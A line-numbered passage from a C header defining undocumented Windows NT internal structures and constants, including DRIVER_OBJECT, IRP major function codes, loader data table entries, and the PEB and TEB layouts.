| PVOID PrepareMdlWrite; 3081 | PVOID MdlWriteComplete; 3082 | PVOID FastIoReadCompressed; 3083 | PVOID FastIoWriteCompressed; 3084 | PVOID MdlReadCompleteCompressed; 3085 | PVOID MdlWriteCompleteCompressed; 3086 | PVOID FastIoQueryOpen; 3087 | PVOID ReleaseForModWrite; 3088 | PVOID AcquireForCcFlush; 3089 | PVOID ReleaseForCcFlush; 3090 | } FAST_IO_DISPATCH, *PFAST_IO_DISPATCH; 3091 | 3092 | #define IO_TYPE_ADAPTER 0x00000001 3093 | #define IO_TYPE_CONTROLLER 0x00000002 3094 | #define IO_TYPE_DEVICE 0x00000003 3095 | #define IO_TYPE_DRIVER 0x00000004 3096 | #define IO_TYPE_FILE 0x00000005 3097 | #define IO_TYPE_IRP 0x00000006 3098 | #define IO_TYPE_MASTER_ADAPTER 0x00000007 3099 | #define IO_TYPE_OPEN_PACKET 0x00000008 3100 | #define IO_TYPE_TIMER 0x00000009 3101 | #define IO_TYPE_VPB 0x0000000a 3102 | #define IO_TYPE_ERROR_LOG 0x0000000b 3103 | #define IO_TYPE_ERROR_MESSAGE 0x0000000c 3104 | #define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d 3105 | 3106 | #define IRP_MJ_CREATE 0x00 3107 | #define IRP_MJ_CREATE_NAMED_PIPE 0x01 3108 | #define IRP_MJ_CLOSE 0x02 3109 | #define IRP_MJ_READ 0x03 3110 | #define IRP_MJ_WRITE 0x04 3111 | #define IRP_MJ_QUERY_INFORMATION 0x05 3112 | #define IRP_MJ_SET_INFORMATION 0x06 3113 | #define IRP_MJ_QUERY_EA 0x07 3114 | #define IRP_MJ_SET_EA 0x08 3115 | #define IRP_MJ_FLUSH_BUFFERS 0x09 3116 | #define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a 3117 | #define IRP_MJ_SET_VOLUME_INFORMATION 0x0b 3118 | #define IRP_MJ_DIRECTORY_CONTROL 0x0c 3119 | #define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d 3120 | #define IRP_MJ_DEVICE_CONTROL 0x0e 3121 | #define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f 3122 | #define IRP_MJ_SHUTDOWN 0x10 3123 | #define IRP_MJ_LOCK_CONTROL 0x11 3124 | #define IRP_MJ_CLEANUP 0x12 3125 | #define IRP_MJ_CREATE_MAILSLOT 0x13 3126 | #define IRP_MJ_QUERY_SECURITY 0x14 3127 | #define IRP_MJ_SET_SECURITY 0x15 3128 | #define IRP_MJ_POWER 0x16 3129 | #define IRP_MJ_SYSTEM_CONTROL 0x17 3130 | #define IRP_MJ_DEVICE_CHANGE 0x18 3131 | #define IRP_MJ_QUERY_QUOTA 0x19 3132 | #define IRP_MJ_SET_QUOTA 0x1a 3133 | #define IRP_MJ_PNP 0x1b 3134 | #define IRP_MJ_PNP_POWER IRP_MJ_PNP 3135 | #define IRP_MJ_MAXIMUM_FUNCTION 0x1b 3136 | 3137 | typedef struct _DRIVER_EXTENSION { 3138 | 3139 | // 3140 | // Back pointer to Driver Object 3141 | // 3142 | 3143 | struct _DRIVER_OBJECT *DriverObject; 3144 | 3145 | // 3146 | // The AddDevice entry point is called by the Plug & Play manager 3147 | // to inform the driver when a new device instance arrives that this 3148 | // driver must control. 3149 | // 3150 | 3151 | PVOID AddDevice; 3152 | 3153 | // 3154 | // The count field is used to count the number of times the driver has 3155 | // had its registered reinitialization routine invoked. 3156 | // 3157 | 3158 | ULONG Count; 3159 | 3160 | // 3161 | // The service name field is used by the pnp manager to determine 3162 | // where the driver related info is stored in the registry. 3163 | // 3164 | 3165 | UNICODE_STRING ServiceKeyName; 3166 | 3167 | } DRIVER_EXTENSION, *PDRIVER_EXTENSION; 3168 | 3169 | #define DRVO_UNLOAD_INVOKED 0x00000001 3170 | #define DRVO_LEGACY_DRIVER 0x00000002 3171 | #define DRVO_BUILTIN_DRIVER 0x00000004 // Driver objects for Hal, PnP Mgr 3172 | #define DRVO_REINIT_REGISTERED 0x00000008 3173 | #define DRVO_INITIALIZED 0x00000010 3174 | #define DRVO_BOOTREINIT_REGISTERED 0x00000020 3175 | #define DRVO_LEGACY_RESOURCES 0x00000040 3176 | // end_ntddk end_nthal end_ntifs end_ntosp 3177 | #define DRVO_BASE_FILESYSTEM_DRIVER 0x00000080 // A driver that is at the bottom of the filesystem stack. 3178 | // begin_ntddk begin_nthal begin_ntifs begin_ntosp 3179 | 3180 | typedef struct _DRIVER_OBJECT { 3181 | CSHORT Type; 3182 | CSHORT Size; 3183 | 3184 | // 3185 | // The following links all of the devices created by a single driver 3186 | // together on a list, and the Flags word provides an extensible flag 3187 | // location for driver objects. 3188 | // 3189 | 3190 | PDEVICE_OBJECT DeviceObject; 3191 | ULONG Flags; 3192 | 3193 | // 3194 | // The following section describes where the driver is loaded. The count 3195 | // field is used to count the number of times the driver has had its 3196 | // registered reinitialization routine invoked. 3197 | // 3198 | 3199 | PVOID DriverStart; 3200 | ULONG DriverSize; 3201 | PVOID DriverSection; //PLDR_DATA_TABLE_ENTRY 3202 | PDRIVER_EXTENSION DriverExtension; 3203 | 3204 | // 3205 | // The driver name field is used by the error log thread 3206 | // determine the name of the driver that an I/O request is/was bound. 3207 | // 3208 | 3209 | UNICODE_STRING DriverName; 3210 | 3211 | // 3212 | // The following section is for registry support. Thise is a pointer 3213 | // to the path to the hardware information in the registry 3214 | // 3215 | 3216 | PUNICODE_STRING HardwareDatabase; 3217 | 3218 | // 3219 | // The following section contains the optional pointer to an array of 3220 | // alternate entry points to a driver for "fast I/O" support. Fast I/O 3221 | // is performed by invoking the driver routine directly with separate 3222 | // parameters, rather than using the standard IRP call mechanism. Note 3223 | // that these functions may only be used for synchronous I/O, and when 3224 | // the file is cached. 3225 | // 3226 | 3227 | PFAST_IO_DISPATCH FastIoDispatch; 3228 | 3229 | // 3230 | // The following section describes the entry points to this particular 3231 | // driver. Note that the major function dispatch table must be the last 3232 | // field in the object so that it remains extensible. 3233 | // 3234 | 3235 | PVOID DriverInit; 3236 | PVOID DriverStartIo; 3237 | PVOID DriverUnload; 3238 | PVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1]; 3239 | 3240 | } DRIVER_OBJECT; 3241 | typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT; 3242 | 3243 | typedef struct _LDR_RESOURCE_INFO { 3244 | ULONG_PTR Type; 3245 | ULONG_PTR Name; 3246 | ULONG Lang; 3247 | } LDR_RESOURCE_INFO, *PLDR_RESOURCE_INFO; 3248 | 3249 | typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE { 3250 | LIST_ENTRY InLoadOrderLinks; 3251 | LIST_ENTRY InMemoryOrderLinks; 3252 | union 3253 | { 3254 | LIST_ENTRY InInitializationOrderLinks; 3255 | LIST_ENTRY InProgressLinks; 3256 | } DUMMYUNION0; 3257 | PVOID DllBase; 3258 | PVOID EntryPoint; 3259 | ULONG SizeOfImage; 3260 | UNICODE_STRING FullDllName; 3261 | UNICODE_STRING BaseDllName; 3262 | ULONG Flags; 3263 | WORD ObsoleteLoadCount; 3264 | WORD TlsIndex; 3265 | union 3266 | { 3267 | LIST_ENTRY HashLinks; 3268 | struct 3269 | { 3270 | PVOID SectionPointer; 3271 | ULONG CheckSum; 3272 | }; 3273 | } DUMMYUNION1; 3274 | union 3275 | { 3276 | ULONG TimeDateStamp; 3277 | PVOID LoadedImports; 3278 | } DUMMYUNION2; 3279 | //fields below removed for compatibility 3280 | } LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE; 3281 | typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY; 3282 | typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE *PLDR_DATA_TABLE_ENTRY; 3283 | typedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY; 3284 | 3285 | typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA { 3286 | ULONG Flags; //Reserved. 3287 | PCUNICODE_STRING FullDllName; //The full path name of the DLL module. 3288 | PCUNICODE_STRING BaseDllName; //The base file name of the DLL module. 3289 | PVOID DllBase; //A pointer to the base address for the DLL in memory. 3290 | ULONG SizeOfImage; //The size of the DLL image, in bytes. 3291 | } LDR_DLL_LOADED_NOTIFICATION_DATA, *PLDR_DLL_LOADED_NOTIFICATION_DATA; 3292 | 3293 | typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA { 3294 | ULONG Flags; //Reserved. 3295 | PCUNICODE_STRING FullDllName; //The full path name of the DLL module. 3296 | PCUNICODE_STRING BaseDllName; //The base file name of the DLL module. 3297 | PVOID DllBase; //A pointer to the base address for the DLL in memory. 3298 | ULONG SizeOfImage; //The size of the DLL image, in bytes. 3299 | } LDR_DLL_UNLOADED_NOTIFICATION_DATA, *PLDR_DLL_UNLOADED_NOTIFICATION_DATA; 3300 | 3301 | typedef union _LDR_DLL_NOTIFICATION_DATA { 3302 | LDR_DLL_LOADED_NOTIFICATION_DATA Loaded; 3303 | LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded; 3304 | } LDR_DLL_NOTIFICATION_DATA, *PLDR_DLL_NOTIFICATION_DATA; 3305 | typedef const LDR_DLL_NOTIFICATION_DATA *PCLDR_DLL_NOTIFICATION_DATA; 3306 | 3307 | #define LDR_DLL_NOTIFICATION_REASON_LOADED 1 3308 | #define LDR_DLL_NOTIFICATION_REASON_UNLOADED 2 3309 | 3310 | /* 3311 | * WDM END 3312 | */ 3313 | 3314 | /* 3315 | * NTQSI Modules START 3316 | */ 3317 | 3318 | typedef struct _RTL_PROCESS_MODULE_INFORMATION { 3319 | HANDLE Section; 3320 | PVOID MappedBase; 3321 | PVOID ImageBase; 3322 | ULONG ImageSize; 3323 | ULONG Flags; 3324 | USHORT LoadOrderIndex; 3325 | USHORT InitOrderIndex; 3326 | USHORT LoadCount; 3327 | USHORT OffsetToFileName; 3328 | UCHAR FullPathName[256]; 3329 | } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; 3330 | 3331 | typedef struct _RTL_PROCESS_MODULES { 3332 | ULONG NumberOfModules; 3333 | RTL_PROCESS_MODULE_INFORMATION Modules[1]; 3334 | } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; 3335 | 3336 | /* 3337 | * NTQSI Modules END 3338 | */ 3339 | 3340 | /* 3341 | ** Virtual Memory START 3342 | */ 3343 | 3344 | typedef enum _MEMORY_INFORMATION_CLASS 3345 | { 3346 | MemoryBasicInformation, 3347 | MemoryWorkingSetInformation, 3348 | MemoryMappedFilenameInformation, 3349 | MemoryRegionInformation, 3350 | MemoryWorkingSetExInformation 3351 | } MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS; 3352 | 3353 | typedef struct _MEMORY_REGION_INFORMATION { 3354 | PVOID AllocationBase; 3355 | ULONG AllocationProtect; 3356 | ULONG RegionType; 3357 | SIZE_T RegionSize; 3358 | } MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION; 3359 | 3360 | /* 3361 | ** Virtual Memory END 3362 | */ 3363 | 3364 | /* 3365 | ** System Firmware START 3366 | */ 3367 | 3368 | typedef enum _SYSTEM_FIRMWARE_TABLE_ACTION 3369 | { 3370 | SystemFirmwareTable_Enumerate, 3371 | SystemFirmwareTable_Get 3372 | } SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION; 3373 | 3374 | typedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION { 3375 | ULONG ProviderSignature; 3376 | SYSTEM_FIRMWARE_TABLE_ACTION Action; 3377 | ULONG TableID; 3378 | ULONG TableBufferLength; 3379 | UCHAR TableBuffer[ANYSIZE_ARRAY]; 3380 | } SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION; 3381 | 3382 | /* 3383 | ** System Firmware END 3384 | */ 3385 | 3386 | // 3387 | // PEB/TEB 3388 | // 3389 | #define GDI_HANDLE_BUFFER_SIZE32 34 3390 | #define GDI_HANDLE_BUFFER_SIZE64 60 3391 | 3392 | #if !defined(_M_X64) 3393 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32 3394 | #else 3395 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64 3396 | #endif 3397 | 3398 | typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32]; 3399 | typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64]; 3400 | typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; 3401 | 3402 | #define RTL_MAX_DRIVE_LETTERS 32 3403 | #define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 3404 | 3405 | #define GDI_MAX_HANDLE_COUNT 0x4000 3406 | 3407 | // 32-bit definitions 3408 | typedef struct _STRING32 { 3409 | USHORT Length; 3410 | USHORT MaximumLength; 3411 | ULONG Buffer; 3412 | } STRING32; 3413 | typedef STRING32 *PSTRING32; 3414 | 3415 | typedef STRING32 UNICODE_STRING32; 3416 | 3417 | #if (_MSC_VER < 1300) && !defined(_WINDOWS_) 3418 | typedef struct LIST_ENTRY32 { 3419 | DWORD Flink; 3420 | DWORD Blink; 3421 | } LIST_ENTRY32; 3422 | typedef LIST_ENTRY32 *PLIST_ENTRY32; 3423 | 3424 | typedef struct LIST_ENTRY64 { 3425 | ULONGLONG Flink; 3426 | ULONGLONG Blink; 3427 | } LIST_ENTRY64; 3428 | typedef LIST_ENTRY64 *PLIST_ENTRY64; 3429 | #endif 3430 | 3431 | #define WOW64_POINTER(Type) ULONG 3432 | 3433 | typedef struct _PEB_LDR_DATA32 { 3434 | ULONG Length; 3435 | BOOLEAN Initialized; 3436 | WOW64_POINTER(HANDLE) SsHandle; 3437 | LIST_ENTRY32 InLoadOrderModuleList; 3438 | LIST_ENTRY32 InMemoryOrderModuleList; 3439 | LIST_ENTRY32 InInitializationOrderModuleList; 3440 | WOW64_POINTER(PVOID) EntryInProgress; 3441 | BOOLEAN ShutdownInProgress; 3442 | WOW64_POINTER(HANDLE) ShutdownThreadId; 3443 | } PEB_LDR_DATA32, *PPEB_LDR_DATA32; 3444 | 3445 | #define LDR_DATA_TABLE_ENTRY_SIZE_WINXP32 FIELD_OFFSET( LDR_DATA_TABLE_ENTRY32, ForwarderLinks ) 3446 | 3447 | typedef struct _LDR_DATA_TABLE_ENTRY32 { 3448 | LIST_ENTRY32 InLoadOrderLinks; 3449 | LIST_ENTRY32 InMemoryOrderLinks; 3450 | LIST_ENTRY32 InInitializationOrderLinks; 3451 | WOW64_POINTER(PVOID) DllBase; 3452 | WOW64_POINTER(PVOID) EntryPoint; 3453 | ULONG SizeOfImage; 3454 | UNICODE_STRING32 FullDllName; 3455 | UNICODE_STRING32 BaseDllName; 3456 | ULONG Flags; 3457 | USHORT LoadCount; 3458 | USHORT TlsIndex; 3459 | union 3460 | { 3461 | LIST_ENTRY32 HashLinks; 3462 | struct 3463 | { 3464 | WOW64_POINTER(PVOID) SectionPointer; 3465 | ULONG CheckSum; 3466 | }; 3467 | }; 3468 | union 3469 | { 3470 | ULONG TimeDateStamp; 3471 | WOW64_POINTER(PVOID) LoadedImports; 3472 | }; 3473 | WOW64_POINTER(PVOID) EntryPointActivationContext; 3474 | WOW64_POINTER(PVOID) PatchInformation; 3475 | LIST_ENTRY32 ForwarderLinks; 3476 | LIST_ENTRY32 ServiceTagLinks; 3477 | LIST_ENTRY32 StaticLinks; 3478 | WOW64_POINTER(PVOID) ContextInformation; 3479 | WOW64_POINTER(ULONG_PTR) OriginalBase; 3480 | LARGE_INTEGER LoadTime; 3481 | } LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32; 3482 | 3483 | typedef struct _CURDIR32 { 3484 | UNICODE_STRING32 DosPath; 3485 | WOW64_POINTER(HANDLE) Handle; 3486 | } CURDIR32, *PCURDIR32; 3487 | 3488 | typedef struct _RTL_DRIVE_LETTER_CURDIR32 { 3489 | USHORT Flags; 3490 | USHORT Length; 3491 | ULONG TimeStamp; 3492 | STRING32 DosPath; 3493 | } RTL_DRIVE_LETTER_CURDIR32, *PRTL_DRIVE_LETTER_CURDIR32; 3494 | 3495 | typedef struct _RTL_USER_PROCESS_PARAMETERS32 { 3496 | ULONG MaximumLength; 3497 | ULONG Length; 3498 | 3499 | ULONG Flags; 3500 | ULONG DebugFlags; 3501 | 3502 | WOW64_POINTER(HANDLE) ConsoleHandle; 3503 | ULONG ConsoleFlags; 3504 | WOW64_POINTER(HANDLE) StandardInput; 3505 | WOW64_POINTER(HANDLE) StandardOutput; 3506 | WOW64_POINTER(HANDLE) StandardError; 3507 | 3508 | CURDIR32 CurrentDirectory; 3509 | UNICODE_STRING32 DllPath; 3510 | UNICODE_STRING32 ImagePathName; 3511 | UNICODE_STRING32 CommandLine; 3512 | WOW64_POINTER(PVOID) Environment; 3513 | 3514 | ULONG StartingX; 3515 | ULONG StartingY; 3516 | ULONG CountX; 3517 | ULONG CountY; 3518 | ULONG CountCharsX; 3519 | ULONG CountCharsY; 3520 | ULONG FillAttribute; 3521 | 3522 | ULONG WindowFlags; 3523 | ULONG ShowWindowFlags; 3524 | UNICODE_STRING32 WindowTitle; 3525 | UNICODE_STRING32 DesktopInfo; 3526 | UNICODE_STRING32 ShellInfo; 3527 | UNICODE_STRING32 RuntimeData; 3528 | RTL_DRIVE_LETTER_CURDIR32 CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 3529 | 3530 | ULONG EnvironmentSize; 3531 | ULONG EnvironmentVersion; 3532 | } RTL_USER_PROCESS_PARAMETERS32, *PRTL_USER_PROCESS_PARAMETERS32; 3533 | 3534 | typedef struct _PEB32 { 3535 | BOOLEAN InheritedAddressSpace; 3536 | BOOLEAN ReadImageFileExecOptions; 3537 | BOOLEAN BeingDebugged; 3538 | union 3539 | { 3540 | BOOLEAN BitField; 3541 | struct 3542 | { 3543 | BOOLEAN ImageUsesLargePages : 1; 3544 | BOOLEAN IsProtectedProcess : 1; 3545 | BOOLEAN IsLegacyProcess : 1; 3546 | BOOLEAN IsImageDynamicallyRelocated : 1; 3547 | BOOLEAN SkipPatchingUser32Forwarders : 1; 3548 | BOOLEAN SpareBits : 3; 3549 | }; 3550 | }; 3551 | WOW64_POINTER(HANDLE) Mutant; 3552 | 3553 | WOW64_POINTER(PVOID) ImageBaseAddress; 3554 | WOW64_POINTER(PPEB_LDR_DATA) Ldr; 3555 | WOW64_POINTER(PRTL_USER_PROCESS_PARAMETERS) ProcessParameters; 3556 | WOW64_POINTER(PVOID) SubSystemData; 3557 | WOW64_POINTER(PVOID) ProcessHeap; 3558 | WOW64_POINTER(PRTL_CRITICAL_SECTION) FastPebLock; 3559 | WOW64_POINTER(PVOID) AtlThunkSListPtr; 3560 | WOW64_POINTER(PVOID) IFEOKey; 3561 | union 3562 | { 3563 | ULONG CrossProcessFlags; 3564 | struct 3565 | { 3566 | ULONG ProcessInJob : 1; 3567 | ULONG ProcessInitializing : 1; 3568 | ULONG ProcessUsingVEH : 1; 3569 | ULONG ProcessUsingVCH : 1; 3570 | ULONG ProcessUsingFTH : 1; 3571 | ULONG ReservedBits0 : 27; 3572 | }; 3573 | ULONG EnvironmentUpdateCount; 3574 | }; 3575 | union 3576 | { 3577 | WOW64_POINTER(PVOID) KernelCallbackTable; 3578 | WOW64_POINTER(PVOID) UserSharedInfoPtr; 3579 | }; 3580 | ULONG SystemReserved[1]; 3581 | ULONG AtlThunkSListPtr32; 3582 | WOW64_POINTER(PVOID) ApiSetMap; 3583 | ULONG TlsExpansionCounter; 3584 | WOW64_POINTER(PVOID) TlsBitmap; 3585 | ULONG TlsBitmapBits[2]; 3586 | WOW64_POINTER(PVOID) ReadOnlySharedMemoryBase; 3587 | WOW64_POINTER(PVOID) HotpatchInformation; 3588 | WOW64_POINTER(PPVOID) ReadOnlyStaticServerData; 3589 | WOW64_POINTER(PVOID) AnsiCodePageData; 3590 | WOW64_POINTER(PVOID) OemCodePageData; 3591 | WOW64_POINTER(PVOID) UnicodeCaseTableData; 3592 | 3593 | ULONG NumberOfProcessors; 3594 | ULONG NtGlobalFlag; 3595 | 3596 | LARGE_INTEGER CriticalSectionTimeout; 3597 | WOW64_POINTER(SIZE_T) HeapSegmentReserve; 3598 | WOW64_POINTER(SIZE_T) HeapSegmentCommit; 3599 | WOW64_POINTER(SIZE_T) HeapDeCommitTotalFreeThreshold; 3600 | WOW64_POINTER(SIZE_T) HeapDeCommitFreeBlockThreshold; 3601 | 3602 | ULONG NumberOfHeaps; 3603 | ULONG MaximumNumberOfHeaps; 3604 | WOW64_POINTER(PPVOID) ProcessHeaps; 3605 | 3606 | WOW64_POINTER(PVOID) GdiSharedHandleTable; 3607 | WOW64_POINTER(PVOID) ProcessStarterHelper; 3608 | ULONG GdiDCAttributeList; 3609 | 3610 | WOW64_POINTER(PRTL_CRITICAL_SECTION) LoaderLock; 3611 | 3612 | ULONG OSMajorVersion; 3613 | ULONG OSMinorVersion; 3614 | USHORT OSBuildNumber; 3615 | USHORT OSCSDVersion; 3616 | ULONG OSPlatformId; 3617 | ULONG ImageSubsystem; 3618 | ULONG ImageSubsystemMajorVersion; 3619 | ULONG ImageSubsystemMinorVersion; 3620 | WOW64_POINTER(ULONG_PTR) ImageProcessAffinityMask; 3621 | GDI_HANDLE_BUFFER32 GdiHandleBuffer; 3622 | WOW64_POINTER(PVOID) PostProcessInitRoutine; 3623 | 3624 | WOW64_POINTER(PVOID) TlsExpansionBitmap; 3625 | ULONG TlsExpansionBitmapBits[32]; 3626 | 3627 | ULONG SessionId; 3628 | 3629 | // Rest of structure not included. 3630 | } PEB32, *PPEB32; 3631 | 3632 | #define GDI_BATCH_BUFFER_SIZE 310 3633 | 3634 | typedef struct _GDI_TEB_BATCH32 { 3635 | ULONG Offset; 3636 | WOW64_POINTER(ULONG_PTR) HDC; 3637 | ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; 3638 | } GDI_TEB_BATCH32, *PGDI_TEB_BATCH32; 3639 | 3640 | #if (_MSC_VER < 1300) && !defined(_WINDOWS_) 3641 | // 3642 | // 32 and 64 bit specific version for wow64 and the debugger 3643 | // 3644 | typedef struct _NT_TIB32 { 3645 | DWORD ExceptionList; 3646 | DWORD StackBase; 3647 | DWORD StackLimit; 3648 | DWORD SubSystemTib; 3649 | union { 3650 | DWORD FiberData; 3651 | DWORD Version; 3652 | }; 3653 | DWORD ArbitraryUserPointer; 3654 | DWORD Self; 3655 | } NT_TIB32, *PNT_TIB32; 3656 | 3657 | typedef struct _NT_TIB64 { 3658 | DWORD64 ExceptionList; 3659 | DWORD64 StackBase; 3660 | DWORD64 StackLimit; 3661 | DWORD64 SubSystemTib; 3662 | union { 3663 | DWORD64 FiberData; 3664 | DWORD Version; 3665 | }; 3666 | DWORD64 ArbitraryUserPointer; 3667 | DWORD64 Self; 3668 | } NT_TIB64, *PNT_TIB64; 3669 | #endif 3670 | 3671 | typedef struct _TEB32 { 3672 | NT_TIB32 NtTib; 3673 | 3674 | WOW64_POINTER(PVOID) EnvironmentPointer; 3675 | CLIENT_ID32 ClientId; 3676 | WOW64_POINTER(PVOID) ActiveRpcHandle; 3677 | WOW64_POINTER(PVOID) ThreadLocalStoragePointer; 3678 | WOW64_POINTER(PPEB) ProcessEnvironmentBlock; 3679 | 3680 | ULONG LastErrorValue; 3681 | ULONG CountOfOwnedCriticalSections; 3682 | WOW64_POINTER(PVOID) CsrClientThread; 3683 | WOW64_POINTER(PVOID) Win32ThreadInfo; 3684 | ULONG User32Reserved[26]; 3685 | ULONG UserReserved[5]; 3686 | WOW64_POINTER(PVOID) WOW32Reserved; 3687 | LCID CurrentLocale; 3688 | ULONG FpSoftwareStatusRegister; 3689 | WOW64_POINTER(PVOID) SystemReserved1[54]; 3690 | NTSTATUS ExceptionCode; 3691 | WOW64_POINTER(PVOID) ActivationContextStackPointer; 3692 | BYTE SpareBytes[36]; 3693 | ULONG TxFsContext; 3694 | 3695 | GDI_TEB_BATCH32 GdiTebBatch; 3696 | CLIENT_ID32 RealClientId; 3697 | WOW64_POINTER(HANDLE) GdiCachedProcessHandle; 3698 | ULONG GdiClientPID; 3699 | ULONG GdiClientTID; 3700 | WOW64_POINTER(PVOID) GdiThreadLocalInfo; 3701 | WOW64_POINTER(ULONG_PTR) Win32ClientInfo[62]; 3702 | WOW64_POINTER(PVOID) glDispatchTable[233]; 3703 | WOW64_POINTER(ULONG_PTR) glReserved1[29]; 3704 | WOW64_POINTER(PVOID) glReserved2; 3705 | WOW64_POINTER(PVOID) glSectionInfo; 3706 | WOW64_POINTER(PVOID) glSection; 3707 | WOW64_POINTER(PVOID) glTable; 3708 | WOW64_POINTER(PVOID) glCurrentRC; 3709 | WOW64_POINTER(PVOID) glContext; 3710 | 3711 | NTSTATUS LastStatusValue; 3712 | UNICODE_STRING32 StaticUnicodeString; 3713 | WCHAR StaticUnicodeBuffer[261]; 3714 | 3715 | WOW64_POINTER(PVOID) DeallocationStack; 3716 | WOW64_POINTER(PVOID) TlsSlots[64]; 3717 | LIST_ENTRY32 TlsLinks; 3718 | } TEB32, *PTEB32; 3719 | 3720 | typedef struct _PEB_LDR_DATA { 3721 | ULONG Length; 3722 | BOOLEAN Initialized; 3723 | HANDLE SsHandle; 3724 | LIST_ENTRY InLoadOrderModuleList; 3725 | LIST_ENTRY InMemoryOrderModuleList; 3726 | LIST_ENTRY InInitializationOrderModuleList; 3727 | PVOID EntryInProgress; 3728 | BOOLEAN ShutdownInProgress; 3729 | HANDLE ShutdownThreadId; 3730 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 3731 | 3732 | typedef struct _GDI_HANDLE_ENTRY { 3733 | union 3734 | { 3735 | PVOID Object; 3736 | PVOID NextFree; 3737 | }; 3738 | union 3739 | { 3740 | struct 3741 | { 3742 | USHORT ProcessId; 3743 | USHORT Lock : 1; 3744 | USHORT Count : 15; 3745 | }; 3746 | ULONG Value; 3747 | } Owner; 3748 | USHORT Unique; 3749 | UCHAR Type; 3750 | UCHAR Flags; 3751 | PVOID UserPointer; 3752 | } GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY; 3753 | 3754 | typedef struct _GDI_SHARED_MEMORY { 3755 | GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT]; 3756 | } GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY; 3757 | 3758 | #define FLS_MAXIMUM_AVAILABLE 128 3759 | #define TLS_MINIMUM_AVAILABLE 64 3760 | #define TLS_EXPANSION_SLOTS 1024 3761 | 3762 | #define DOS_MAX_COMPONENT_LENGTH 255 3763 | #define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5) 3764 | 3765 | typedef struct _CURDIR 3766 | { 3767 | UNICODE_STRING DosPath; 3768 | HANDLE Handle; 3769 | } CURDIR, *PCURDIR; 3770 | 3771 | #define RTL_USER_PROC_CURDIR_CLOSE 0x00000002 3772 | #define RTL_USER_PROC_CURDIR_INHERIT 0x00000003 3773 | 3774 | typedef struct _RTL_DRIVE_LETTER_CURDIR 3775 | { 3776 | USHORT Flags; 3777 | USHORT Length; 3778 | ULONG TimeStamp; 3779 | STRING DosPath; 3780 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 3781 | 3782 | typedef struct _RTL_USER_PROCESS_PARAMETERS 3783 | { 3784 | ULONG MaximumLength; 3785 | ULONG Length; 3786 | 3787 | ULONG Flags; 3788 | ULONG DebugFlags; 3789 | 3790 | HANDLE ConsoleHandle; 3791 | ULONG ConsoleFlags; 3792 | HANDLE StandardInput; 3793 | HANDLE StandardOutput; 3794 | HANDLE StandardError; 3795 | 3796 | CURDIR CurrentDirectory; 3797 | UNICODE_STRING DllPath; 3798 | UNICODE_STRING ImagePathName; 3799 | UNICODE_STRING CommandLine; 3800 | PVOID Environment; 3801 | 3802 | ULONG StartingX; 3803 | ULONG StartingY; 3804 | ULONG CountX; 3805 | ULONG CountY; 3806 | ULONG CountCharsX; 3807 | ULONG CountCharsY; 3808 | ULONG FillAttribute; 3809 | 3810 | ULONG WindowFlags; 3811 | ULONG ShowWindowFlags; 3812 | UNICODE_STRING WindowTitle; 3813 | UNICODE_STRING DesktopInfo; 3814 | UNICODE_STRING ShellInfo; 3815 | UNICODE_STRING RuntimeData; 3816 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 3817 | 3818 | ULONG EnvironmentSize; 3819 | ULONG EnvironmentVersion; 3820 | PVOID PackageDependencyData; //8+ 3821 | ULONG ProcessGroupId; 3822 | // ULONG LoaderThreads; 3823 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 3824 | 3825 | typedef struct _PEB 3826 | { 3827 | BOOLEAN InheritedAddressSpace; 3828 | BOOLEAN ReadImageFileExecOptions; 3829 | BOOLEAN BeingDebugged; 3830 | union 3831 | { 3832 | BOOLEAN BitField; 3833 | struct 3834 | { 3835 | BOOLEAN ImageUsesLargePages : 1; 3836 | BOOLEAN IsProtectedProcess : 1; 3837 | BOOLEAN IsLegacyProcess : 1; 3838 | BOOLEAN IsImageDynamicallyRelocated : 1; 3839 | BOOLEAN SkipPatchingUser32Forwarders : 1; 3840 | BOOLEAN SpareBits : 3; 3841 | }; 3842 | }; 3843 | HANDLE Mutant; 3844 | 3845 | PVOID ImageBaseAddress; 3846 | 